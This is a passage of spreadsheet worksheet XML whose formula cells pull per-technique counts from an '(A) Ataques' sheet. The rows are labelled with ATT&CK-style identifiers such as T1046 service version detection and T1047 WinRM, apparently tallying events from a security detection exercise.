        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!CE17,"")</f>
        <v>123</v>
      </c>
      <c r="AD17" s="331">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF(Z17=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE17" s="322">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CF17,"")</f>
        <v>19838</v>
      </c>
      <c r="AF17" s="322">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CH17,"")</f>
        <v>2027</v>
      </c>
      <c r="AG17" s="4">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CJ17,"")</f>
        <v>754</v>
      </c>
      <c r="AH17" s="20">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CK17,"")</f>
        <v>156</v>
      </c>
      <c r="AI17" s="287">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($AE17=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ17" s="292">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CL17,"")</f>
        <v>0</v>
      </c>
      <c r="AK17" s="322">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CN17,"")</f>
        <v>0</v>
      </c>
      <c r="AL17" s="4">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CP17,"")</f>
        <v>0</v>
      </c>
      <c r="AM17" s="20">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CQ17,"")</f>
        <v>0</v>
      </c>
      <c r="AN17" s="331">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($AJ17=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO17" s="322">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CR17,"")</f>
        <v>1806</v>
      </c>
      <c r="AP17" s="322">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CT17,"")</f>
        <v>620</v>
      </c>
      <c r="AQ17" s="4">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CV17,"")</f>
        <v>337</v>
      </c>
      <c r="AR17" s="20">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$CW17,"")</f>
        <v>122</v>
      </c>
      <c r="AS17" s="287">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($AO17=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT17" s="288">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!CX17,"")</f>
        <v>2913</v>
      </c>
      <c r="AU17" s="392">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!CZ17,"")</f>
        <v>1009</v>
      </c>
      <c r="AV17" s="4">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!DB17,"")</f>
        <v>459</v>
      </c>
      <c r="AW17" s="20">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!DC17,"")</f>
        <v>133</v>
      </c>
      <c r="AX17" s="331">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($AT17=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY17" s="469">
        <f>'(A) Ataques'!LU17+'(A) Ataques'!MA17+'(A) Ataques'!MG17+'(A) Ataques'!MM17+'(A) Ataques'!MS17</f>
        <v>685</v>
      </c>
      <c r="AZ17" s="510">
        <f>'(A) Ataques'!LW17+'(A) Ataques'!MC17+'(A) Ataques'!MI17+'(A) Ataques'!MO17+'(A) Ataques'!MU17</f>
        <v>455</v>
      </c>
      <c r="BA17" s="471">
        <f>'(A) Ataques'!LY17+'(A) Ataques'!ME17+'(A) Ataques'!MK17+'(A) Ataques'!MQ17+'(A) Ataques'!MW17</f>
        <v>106</v>
      </c>
      <c r="BB17" s="471">
        <f>'(A) Ataques'!LQ17</f>
        <v>158</v>
      </c>
      <c r="BC17" s="331">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($AY17=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD17" s="469">
        <f>IF('(A) Ataques'!$AP17&lt;&gt;"NO",'(A) Ataques'!LL17,"")</f>
        <v>845</v>
      </c>
      <c r="BE17" s="510">
        <f>IF('(A) Ataques'!$AP17&lt;&gt;"NO",'(A) Ataques'!LM17,"")</f>
        <v>615</v>
      </c>
      <c r="BF17" s="471">
        <f>IF('(A) Ataques'!$AP17&lt;&gt;"NO",'(A) Ataques'!LN17,"")</f>
        <v>106</v>
      </c>
      <c r="BG17" s="471">
        <f>IF('(A) Ataques'!$AP17&lt;&gt;"NO",'(A) Ataques'!LO17,"")</f>
        <v>3</v>
      </c>
      <c r="BH17" s="471">
        <f>IF('(A) Ataques'!$AP17&lt;&gt;"NO",'(A) Ataques'!LS17,"")</f>
        <v>160</v>
      </c>
      <c r="BI17" s="331">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($BD17=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ17" s="469">
        <f>'(A) Ataques'!OL17+'(A) Ataques'!OR17+'(A) Ataques'!OX17+'(A) Ataques'!PD17+'(A) Ataques'!PJ17</f>
        <v>5547</v>
      </c>
      <c r="BK17" s="510">
        <f>'(A) Ataques'!ON17+'(A) Ataques'!OT17+'(A) Ataques'!OZ17+'(A) Ataques'!PF17+'(A) Ataques'!PL17</f>
        <v>261</v>
      </c>
      <c r="BL17" s="471">
        <f>'(A) Ataques'!OP17+'(A) Ataques'!OV17+'(A) Ataques'!PB17+'(A) Ataques'!PH17+'(A) Ataques'!PN17</f>
        <v>74</v>
      </c>
      <c r="BM17" s="495">
        <f>'(A) Ataques'!OH17</f>
        <v>157</v>
      </c>
      <c r="BN17" s="331">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($BJ17=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO17" s="469">
        <f>IF('(A) Ataques'!$AP17&lt;&gt;"NO",'(A) Ataques'!OC17,"")</f>
        <v>5547</v>
      </c>
      <c r="BP17" s="510">
        <f>IF('(A) Ataques'!$AP17&lt;&gt;"NO",'(A) Ataques'!OD17,"")</f>
        <v>262</v>
      </c>
      <c r="BQ17" s="471">
        <f>IF('(A) Ataques'!$AP17&lt;&gt;"NO",'(A) Ataques'!OE17,"")</f>
        <v>74</v>
      </c>
      <c r="BR17" s="471">
        <f>IF('(A) Ataques'!$AP17&lt;&gt;"NO",'(A) Ataques'!OF17,"")</f>
        <v>2</v>
      </c>
      <c r="BS17" s="471">
        <f>IF('(A) Ataques'!$AP17&lt;&gt;"NO",'(A) Ataques'!OJ17,"")</f>
        <v>157</v>
      </c>
      <c r="BT17" s="331">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($BO17=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A18" s="79">
        <f t="shared" si="0"/>
        <v>16</v>
      </c>
      <c r="B18" s="4">
        <f>IF('(A) Ataques'!AK18&lt;&gt;"NO",'(A) Ataques'!E18,"")</f>
        <v>13</v>
      </c>
      <c r="C18" s="6" t="str">
        <f>IF('(A) Ataques'!AK18&lt;&gt;"NO",IF('(A) Ataques'!M18="","",'(A) Ataques'!M18),"")</f>
        <v>T1046-Version_services_detection2</v>
      </c>
      <c r="D18" s="4" t="str">
        <f>IF('(A) Ataques'!AK18&lt;&gt;"NO",'(A) Ataques'!F18,"")</f>
        <v>T1046</v>
      </c>
      <c r="E18" s="286">
        <f>IF('(A) Ataques'!AK18&lt;&gt;"NO",'(A) Ataques'!AQ18,"")</f>
        <v>65684</v>
      </c>
      <c r="F18" s="288">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!BB18,"")</f>
        <v>0</v>
      </c>
      <c r="G18" s="392">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!BD18,"")</f>
        <v>0</v>
      </c>
      <c r="H18" s="4">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!BF18,"")</f>
        <v>0</v>
      </c>
      <c r="I18" s="20">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!BG18,"")</f>
        <v>0</v>
      </c>
      <c r="J18" s="530">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($F18=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K18" s="322">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BH18,"")</f>
        <v>17</v>
      </c>
      <c r="L18" s="322">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BJ18,"")</f>
        <v>17</v>
      </c>
      <c r="M18" s="4">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BL18,"")</f>
        <v>11</v>
      </c>
      <c r="N18" s="20">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BM18,"")</f>
        <v>13</v>
      </c>
      <c r="O18" s="532">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($K18=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P18" s="292">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BN18,"")</f>
        <v>17</v>
      </c>
      <c r="Q18" s="322">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BP18,"")</f>
        <v>17</v>
      </c>
      <c r="R18" s="4">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BR18,"")</f>
        <v>11</v>
      </c>
      <c r="S18" s="20">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BS18,"")</f>
        <v>13</v>
      </c>
      <c r="T18" s="530">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($P18=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U18" s="322">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BT18,"")</f>
        <v>17</v>
      </c>
      <c r="V18" s="322">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BV18,"")</f>
        <v>16</v>
      </c>
      <c r="W18" s="4">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BX18,"")</f>
        <v>12</v>
      </c>
      <c r="X18" s="20">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$BY18,"")</f>
        <v>12</v>
      </c>
      <c r="Y18" s="532">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($U18=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z18" s="288">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!BZ18,"")</f>
        <v>29</v>
      </c>
      <c r="AA18" s="392">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!CB18,"")</f>
        <v>27</v>
      </c>
      <c r="AB18" s="4">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!CD18,"")</f>
        <v>21</v>
      </c>
      <c r="AC18" s="20">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!CE18,"")</f>
        <v>17</v>
      </c>
      <c r="AD18" s="331">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF(Z18=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE18" s="322">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CF18,"")</f>
        <v>46</v>
      </c>
      <c r="AF18" s="322">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CH18,"")</f>
        <v>43</v>
      </c>
      <c r="AG18" s="4">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CJ18,"")</f>
        <v>33</v>
      </c>
      <c r="AH18" s="20">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CK18,"")</f>
        <v>20</v>
      </c>
      <c r="AI18" s="287">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($AE18=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ18" s="292">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CL18,"")</f>
        <v>0</v>
      </c>
      <c r="AK18" s="322">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CN18,"")</f>
        <v>0</v>
      </c>
      <c r="AL18" s="4">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CP18,"")</f>
        <v>0</v>
      </c>
      <c r="AM18" s="20">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CQ18,"")</f>
        <v>0</v>
      </c>
      <c r="AN18" s="331">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($AJ18=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO18" s="322">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CR18,"")</f>
        <v>9</v>
      </c>
      <c r="AP18" s="322">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CT18,"")</f>
        <v>9</v>
      </c>
      <c r="AQ18" s="4">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CV18,"")</f>
        <v>9</v>
      </c>
      <c r="AR18" s="20">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!$CW18,"")</f>
        <v>6</v>
      </c>
      <c r="AS18" s="287">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($AO18=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT18" s="288">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!CX18,"")</f>
        <v>26</v>
      </c>
      <c r="AU18" s="392">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!CZ18,"")</f>
        <v>26</v>
      </c>
      <c r="AV18" s="4">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!DB18,"")</f>
        <v>20</v>
      </c>
      <c r="AW18" s="20">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",'(A) Ataques'!DC18,"")</f>
        <v>17</v>
      </c>
      <c r="AX18" s="331">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($AT18=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY18" s="469">
        <f>'(A) Ataques'!LU18+'(A) Ataques'!MA18+'(A) Ataques'!MG18+'(A) Ataques'!MM18+'(A) Ataques'!MS18</f>
        <v>11</v>
      </c>
      <c r="AZ18" s="510">
        <f>'(A) Ataques'!LW18+'(A) Ataques'!MC18+'(A) Ataques'!MI18+'(A) Ataques'!MO18+'(A) Ataques'!MU18</f>
        <v>11</v>
      </c>
      <c r="BA18" s="471">
        <f>'(A) Ataques'!LY18+'(A) Ataques'!ME18+'(A) Ataques'!MK18+'(A) Ataques'!MQ18+'(A) Ataques'!MW18</f>
        <v>3</v>
      </c>
      <c r="BB18" s="471">
        <f>'(A) Ataques'!LQ18</f>
        <v>11</v>
      </c>
      <c r="BC18" s="331">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($AY18=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD18" s="469">
        <f>IF('(A) Ataques'!$AP18&lt;&gt;"NO",'(A) Ataques'!LL18,"")</f>
        <v>30</v>
      </c>
      <c r="BE18" s="510">
        <f>IF('(A) Ataques'!$AP18&lt;&gt;"NO",'(A) Ataques'!LM18,"")</f>
        <v>30</v>
      </c>
      <c r="BF18" s="471">
        <f>IF('(A) Ataques'!$AP18&lt;&gt;"NO",'(A) Ataques'!LN18,"")</f>
        <v>3</v>
      </c>
      <c r="BG18" s="471">
        <f>IF('(A) Ataques'!$AP18&lt;&gt;"NO",'(A) Ataques'!LO18,"")</f>
        <v>8</v>
      </c>
      <c r="BH18" s="471">
        <f>IF('(A) Ataques'!$AP18&lt;&gt;"NO",'(A) Ataques'!LS18,"")</f>
        <v>24</v>
      </c>
      <c r="BI18" s="331">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($BD18=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ18" s="469">
        <f>'(A) Ataques'!OL18+'(A) Ataques'!OR18+'(A) Ataques'!OX18+'(A) Ataques'!PD18+'(A) Ataques'!PJ18</f>
        <v>12</v>
      </c>
      <c r="BK18" s="510">
        <f>'(A) Ataques'!ON18+'(A) Ataques'!OT18+'(A) Ataques'!OZ18+'(A) Ataques'!PF18+'(A) Ataques'!PL18</f>
        <v>12</v>
      </c>
      <c r="BL18" s="471">
        <f>'(A) Ataques'!OP18+'(A) Ataques'!OV18+'(A) Ataques'!PB18+'(A) Ataques'!PH18+'(A) Ataques'!PN18</f>
        <v>5</v>
      </c>
      <c r="BM18" s="495">
        <f>'(A) Ataques'!OH18</f>
        <v>10</v>
      </c>
      <c r="BN18" s="331">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($BJ18=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO18" s="469">
        <f>IF('(A) Ataques'!$AP18&lt;&gt;"NO",'(A) Ataques'!OC18,"")</f>
        <v>12</v>
      </c>
      <c r="BP18" s="510">
        <f>IF('(A) Ataques'!$AP18&lt;&gt;"NO",'(A) Ataques'!OD18,"")</f>
        <v>12</v>
      </c>
      <c r="BQ18" s="471">
        <f>IF('(A) Ataques'!$AP18&lt;&gt;"NO",'(A) Ataques'!OE18,"")</f>
        <v>5</v>
      </c>
      <c r="BR18" s="471">
        <f>IF('(A) Ataques'!$AP18&lt;&gt;"NO",'(A) Ataques'!OF18,"")</f>
        <v>4</v>
      </c>
      <c r="BS18" s="471">
        <f>IF('(A) Ataques'!$AP18&lt;&gt;"NO",'(A) Ataques'!OJ18,"")</f>
        <v>10</v>
      </c>
      <c r="BT18" s="331">
        <f>IF('(A) Ataques'!$AK18&lt;&gt;"NO",IF($BO18=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A19" s="79">
        <f t="shared" si="0"/>
        <v>17</v>
      </c>
      <c r="B19" s="4">
        <f>IF('(A) Ataques'!AK19&lt;&gt;"NO",'(A) Ataques'!E19,"")</f>
        <v>14</v>
      </c>
      <c r="C19" s="6" t="str">
        <f>IF('(A) Ataques'!AK19&lt;&gt;"NO",IF('(A) Ataques'!M19="","",'(A) Ataques'!M19),"")</f>
        <v>T1047-WinRM</v>
      </c>
      <c r="D19" s="4" t="str">
        <f>IF('(A) Ataques'!AK19&lt;&gt;"NO",'(A) Ataques'!F19,"")</f>
        <v>T1047</v>
      </c>
      <c r="E19" s="286">
        <f>IF('(A) Ataques'!AK19&lt;&gt;"NO",'(A) Ataques'!AQ19,"")</f>
        <v>912</v>
      </c>
      <c r="F19" s="288">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!BB19,"")</f>
        <v>13</v>
      </c>
      <c r="G19" s="392">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!BD19,"")</f>
        <v>5</v>
      </c>
      <c r="H19" s="4">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!BF19,"")</f>
        <v>3</v>
      </c>
      <c r="I19" s="20">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!BG19,"")</f>
        <v>3</v>
      </c>
      <c r="J19" s="530">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($F19=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K19" s="322">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BH19,"")</f>
        <v>1369</v>
      </c>
      <c r="L19" s="322">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BJ19,"")</f>
        <v>1322</v>
      </c>
      <c r="M19" s="4">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BL19,"")</f>
        <v>6</v>
      </c>
      <c r="N19" s="20">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BM19,"")</f>
        <v>878</v>
      </c>
      <c r="O19" s="532">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($K19=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P19" s="292">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BN19,"")</f>
        <v>1382</v>
      </c>
      <c r="Q19" s="322">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BP19,"")</f>
        <v>1327</v>
      </c>
      <c r="R19" s="4">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BR19,"")</f>
        <v>9</v>
      </c>
      <c r="S19" s="20">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BS19,"")</f>
        <v>878</v>
      </c>
      <c r="T19" s="530">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($P19=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U19" s="322">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BT19,"")</f>
        <v>959</v>
      </c>
      <c r="V19" s="322">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BV19,"")</f>
        <v>904</v>
      </c>
      <c r="W19" s="4">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BX19,"")</f>
        <v>7</v>
      </c>
      <c r="X19" s="20">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$BY19,"")</f>
        <v>878</v>
      </c>
      <c r="Y19" s="532">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($U19=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z19" s="288">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!BZ19,"")</f>
        <v>2287</v>
      </c>
      <c r="AA19" s="392">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!CB19,"")</f>
        <v>2204</v>
      </c>
      <c r="AB19" s="4">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!CD19,"")</f>
        <v>13</v>
      </c>
      <c r="AC19" s="20">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!CE19,"")</f>
        <v>878</v>
      </c>
      <c r="AD19" s="331">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF(Z19=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE19" s="322">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CF19,"")</f>
        <v>3246</v>
      </c>
      <c r="AF19" s="322">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CH19,"")</f>
        <v>3108</v>
      </c>
      <c r="AG19" s="4">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CJ19,"")</f>
        <v>20</v>
      </c>
      <c r="AH19" s="20">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CK19,"")</f>
        <v>878</v>
      </c>
      <c r="AI19" s="287">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($AE19=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ19" s="292">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CL19,"")</f>
        <v>0</v>
      </c>
      <c r="AK19" s="322">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CN19,"")</f>
        <v>0</v>
      </c>
      <c r="AL19" s="4">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CP19,"")</f>
        <v>0</v>
      </c>
      <c r="AM19" s="20">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CQ19,"")</f>
        <v>0</v>
      </c>
      <c r="AN19" s="331">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($AJ19=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO19" s="322">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CR19,"")</f>
        <v>34</v>
      </c>
      <c r="AP19" s="322">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CT19,"")</f>
        <v>20</v>
      </c>
      <c r="AQ19" s="4">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CV19,"")</f>
        <v>1</v>
      </c>
      <c r="AR19" s="20">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!$CW19,"")</f>
        <v>20</v>
      </c>
      <c r="AS19" s="287">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($AO19=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT19" s="288">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!CX19,"")</f>
        <v>1416</v>
      </c>
      <c r="AU19" s="392">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!CZ19,"")</f>
        <v>1347</v>
      </c>
      <c r="AV19" s="4">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!DB19,"")</f>
        <v>10</v>
      </c>
      <c r="AW19" s="20">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",'(A) Ataques'!DC19,"")</f>
        <v>878</v>
      </c>
      <c r="AX19" s="331">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($AT19=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY19" s="469">
        <f>'(A) Ataques'!LU19+'(A) Ataques'!MA19+'(A) Ataques'!MG19+'(A) Ataques'!MM19+'(A) Ataques'!MS19</f>
        <v>3</v>
      </c>
      <c r="AZ19" s="510">
        <f>'(A) Ataques'!LW19+'(A) Ataques'!MC19+'(A) Ataques'!MI19+'(A) Ataques'!MO19+'(A) Ataques'!MU19</f>
        <v>3</v>
      </c>
      <c r="BA19" s="471">
        <f>'(A) Ataques'!LY19+'(A) Ataques'!ME19+'(A) Ataques'!MK19+'(A) Ataques'!MQ19+'(A) Ataques'!MW19</f>
        <v>2</v>
      </c>
      <c r="BB19" s="471">
        <f>'(A) Ataques'!LQ19</f>
        <v>2</v>
      </c>
      <c r="BC19" s="331">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($AY19=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD19" s="469">
        <f>IF('(A) Ataques'!$AP19&lt;&gt;"NO",'(A) Ataques'!LL19,"")</f>
        <v>1826</v>
      </c>
      <c r="BE19" s="510">
        <f>IF('(A) Ataques'!$AP19&lt;&gt;"NO",'(A) Ataques'!LM19,"")</f>
        <v>1823</v>
      </c>
      <c r="BF19" s="471">
        <f>IF('(A) Ataques'!$AP19&lt;&gt;"NO",'(A) Ataques'!LN19,"")</f>
        <v>2</v>
      </c>
      <c r="BG19" s="471">
        <f>IF('(A) Ataques'!$AP19&lt;&gt;"NO",'(A) Ataques'!LO19,"")</f>
        <v>5</v>
      </c>
      <c r="BH19" s="471">
        <f>IF('(A) Ataques'!$AP19&lt;&gt;"NO",'(A) Ataques'!LS19,"")</f>
        <v>912</v>
      </c>
      <c r="BI19" s="331">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($BD19=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ19" s="469">
        <f>'(A) Ataques'!OL19+'(A) Ataques'!OR19+'(A) Ataques'!OX19+'(A) Ataques'!PD19+'(A) Ataques'!PJ19</f>
        <v>0</v>
      </c>
      <c r="BK19" s="510">
        <f>'(A) Ataques'!ON19+'(A) Ataques'!OT19+'(A) Ataques'!OZ19+'(A) Ataques'!PF19+'(A) Ataques'!PL19</f>
        <v>0</v>
      </c>
      <c r="BL19" s="471">
        <f>'(A) Ataques'!OP19+'(A) Ataques'!OV19+'(A) Ataques'!PB19+'(A) Ataques'!PH19+'(A) Ataques'!PN19</f>
        <v>0</v>
      </c>
      <c r="BM19" s="495">
        <f>'(A) Ataques'!OH19</f>
        <v>0</v>
      </c>
      <c r="BN19" s="331">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($BJ19=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO19" s="469">
